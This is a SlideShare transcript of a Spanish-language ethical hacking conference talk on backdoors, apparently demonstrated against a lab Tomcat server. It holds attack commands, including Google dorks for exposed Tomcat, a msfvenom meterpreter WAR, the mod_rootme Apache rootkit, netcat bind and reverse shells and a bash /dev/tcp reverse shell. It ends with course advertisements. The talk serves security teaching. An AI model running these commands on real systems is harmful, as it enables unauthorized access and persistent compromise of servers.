Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo...
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo...
#whoami
• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,
C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
• Instructor...
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Ba...
¿Qué es un Backdoor (puerta trasera)?
• Los backdoors son programas utilizados
por los hackers para lograr acceso a
sistem...
Arquitectura de los Ejemplos
TARGET
- Servidor TOMCAT vulnerable
- Aquí se instalaran los backdoors
- Sistema Operativo Li...
Identificar Servicios TOMCAT
• Buscamos TOMCAT en la RED LAN a
través de NMAP
Nmap –sV –p 8080 –sS TARGET
auxiliary/scanne...
Ahora si …. Vamos con los ejemplos
Identificar Vulnerabilidades en TOMCAT
• Vamos a utilizar METASPLOIT para identificar
vulnerabilidades:
Root> msfconsole
R...
Backdoor con SETUID
• De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues este
mecanismo de b...
Backdoor con SETUID
Backdoor en Apache Server
• Cargamos un módulo en APACHE de tal
manera que no se realicen cambios a nivel de
código en los...
Backdoor en Apache Server
• Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2....
Backdoor: BindShell
• Las primeras herramientas utilizados por
Hackers fue la navaja suiza “NETCAT”.
• Una BindShell es un...
Backdoor: Bind Shell
• Comandos en el sistema operativo:
root>./configure --enable-
DGAPING_SECURITY_HOLE
root>Make
root> ...
Backdoor: Reverse Shell
• Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
• Ahora es el servi...
Backdoor: Reverse Shell
• Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
bash -i >& /dev/t...
Backdoor: Reverse Shell
• Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
./netcat -e /bi...
Backdoor: KnockOut
• Knock viene del ingles tocar la
puerta.
• Este es un backdoor del tipo
“Reverse Shell” que pasa
desap...
Backdoor: KnockOut
• En el servidor:
• Root> $make servidor
• Root> ./knock-outd knock-out.conf eth5
• En el cliente (atac...
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Ba...
Curso de Ethical Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniería (UNI) – Lima – Pe...
Curso de Seguridad de Información
http://www.kunak.com.pe
Lugar: Miraflores – Lima – Perú
Duración: 60 horas
Certificado: ...
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
Upcoming SlideShare
Loading in …5
×

Conferencia Innovación en Técnicas de Ethical Hacking

143 views

Published on

Exposición de Ing. Omar Palomino Huamani
Consultor de Seguridad de la Información
Kunak Consulting
Realizada en el VIII Congreso Internacional de Informática Forense y Hacking Etico

Published in: Education
  • Be the first to comment

  • Be the first to like this

Conferencia Innovación en Técnicas de Ethical Hacking

  1. 1. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  2. 2. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  3. 3. #whoami • Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH, C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002 • Instructor Oficial de MILE2 • Consultor de Kunak Consulting SAC http://www.kunak.com.pe • Psicólogo que aun no comienza sus estudios…. • Escritor en mis tiempos libres: http://www.el-palomo.com • Correo electrónico: • omarc320@gmail.com • opalomino@kunak.com.pe • Cuenta de Facebook: • www.facebook.com/El.Palomo.Seguridad.Informacion
  4. 4. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  5. 5. ¿Qué es un Backdoor (puerta trasera)? • Los backdoors son programas utilizados por los hackers para lograr acceso a sistemas operativos de manera rápida y sencilla. • Existen diferentes tipos de backdoors: • Backdoors en Aplicaciones Web • Backdoors a través de SETUID • Backdoors en Módulos de Servicios • Backdoors del tipo Knocking
  6. 6. Arquitectura de los Ejemplos TARGET - Servidor TOMCAT vulnerable - Aquí se instalaran los backdoors - Sistema Operativo Linux ATACANTE - Computador desde el cual se realizarán los ataques - Sistema Operativo KALI LINUX 2 ATACANTE 2 - Computador desde el cual se explotaran los backdoors - Sistema Operativo Linux Dirección IP: 192.168.4.131 Dirección IP: 192.168.4.130 Dirección IP: 192.168.4.132
  7. 7. Identificar Servicios TOMCAT • Buscamos TOMCAT en la RED LAN a través de NMAP Nmap –sV –p 8080 –sS TARGET auxiliary/scanner/portscan/syn Buscamos TOMCAT/AXIS2 en INTERNET: Google Dork: intitle:"Tomcat Server Administration“ intitle:"Axis2 Happiness Page" +ext:jsp
  8. 8. Ahora si …. Vamos con los ejemplos
  9. 9. Identificar Vulnerabilidades en TOMCAT • Vamos a utilizar METASPLOIT para identificar vulnerabilidades: Root> msfconsole Root> search tomcat Root> use auxiliary/scanner/http/tomcat_mgr_login Root> show options Root> set RHOSTS 192.168.4.130 Finalmente realizar la carga de un .WAR malicioso para obtener acceso al sistema operativo. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.4.131 -f war > meterpreter.war En el cliente: Msf> use exploit/multi/handler Msf> set payload java/meterpreter/reverse_tcp
  10. 10. Backdoor con SETUID • De pronto algunos nunca escucharon de los permisos GETUID, SETUID y STICKY. Pues este mecanismo de backdoor está asociado a SETUID. ¿Entonces en que consiste el SETUID? El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario. El concepto puede sonar muy abstracto pero si ponemos un ejemplo es más facil entender, vamos a crear un archivo llamado TEST.C y lo compilamos.
  11. 11. Backdoor con SETUID
  12. 12. Backdoor en Apache Server • Cargamos un módulo en APACHE de tal manera que no se realicen cambios a nivel de código en los aplicativos PHP. • ¿Cuántos administradores de Sistemas verifican los módulos cargados en Apache? • Toca compilar un módulo de APACHE llamado ModROOTme. https://github.com/jingchunzhang/backdoor_rootkit/ tree/master/mod_rootme-0.4
  13. 13. Backdoor en Apache Server • Comandos en el Sistema Operativo root>cd mod_rootme-0.4/ root>Make Linux root> cp mod_rootme2.so /etc/httpd/modules root> /etc/init.d/httpd reload En el cliente: Root> nc 192.168.4.130 80 GET root
  14. 14. Backdoor: BindShell • Las primeras herramientas utilizados por Hackers fue la navaja suiza “NETCAT”. • Una BindShell es un programa corriendo una SHELL dentro de un proceso de red. • Una BindShell puede estar escrita en cualquier lenguaje de programación. http://netcat.sourceforge.net/download.php
  15. 15. Backdoor: Bind Shell • Comandos en el sistema operativo: root>./configure --enable- DGAPING_SECURITY_HOLE root>Make root> cd src/ root> ./netcat -l -p 8443 -e /bin/sh root> bg En el CLIENTE: C:>nc64.exe 192.168.75.133 8443
  16. 16. Backdoor: Reverse Shell • Tiene el mismo concepto que una Bind Shell pero realizada de manera reversa. • Ahora es el servidor quien se conecta a nuestro cliente. Esta pensado para poder realizar bypass de Firewalls.
  17. 17. Backdoor: Reverse Shell • Reverse Shell con BASH En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
  18. 18. Backdoor: Reverse Shell • Reverse Shell con NETCAT En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: ./netcat -e /bin/sh 192.168.1.34 8080
  19. 19. Backdoor: KnockOut • Knock viene del ingles tocar la puerta. • Este es un backdoor del tipo “Reverse Shell” que pasa desapercibido. • Sólo puede ser accedido por aquel que conozca la combinación de la “puerta” correcta.
  20. 20. Backdoor: KnockOut • En el servidor: • Root> $make servidor • Root> ./knock-outd knock-out.conf eth5 • En el cliente (atacante): • Root> $make cliente • Root> ./knock-outc 192.168.4.130 knock-out.conf • Root> ./netcat -lv -p 64876
  21. 21. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  22. 22. Curso de Ethical Hacking https://www.facebook.com/sistemasuni/ Lugar: Universidad Nacional de Ingeniería (UNI) – Lima – Perú Duración: 24 horas – Curso Básico 24 horas – Curso Avanzado Certificado: A nombre de la Universidad Nacional de Ingeniería (UNI) Próximo Inicio: Inicios Recurrentes
  23. 23. Curso de Seguridad de Información http://www.kunak.com.pe Lugar: Miraflores – Lima – Perú Duración: 60 horas Certificado: A nombre Kunak Consulting SAC Próximo Inicio: Por definir

×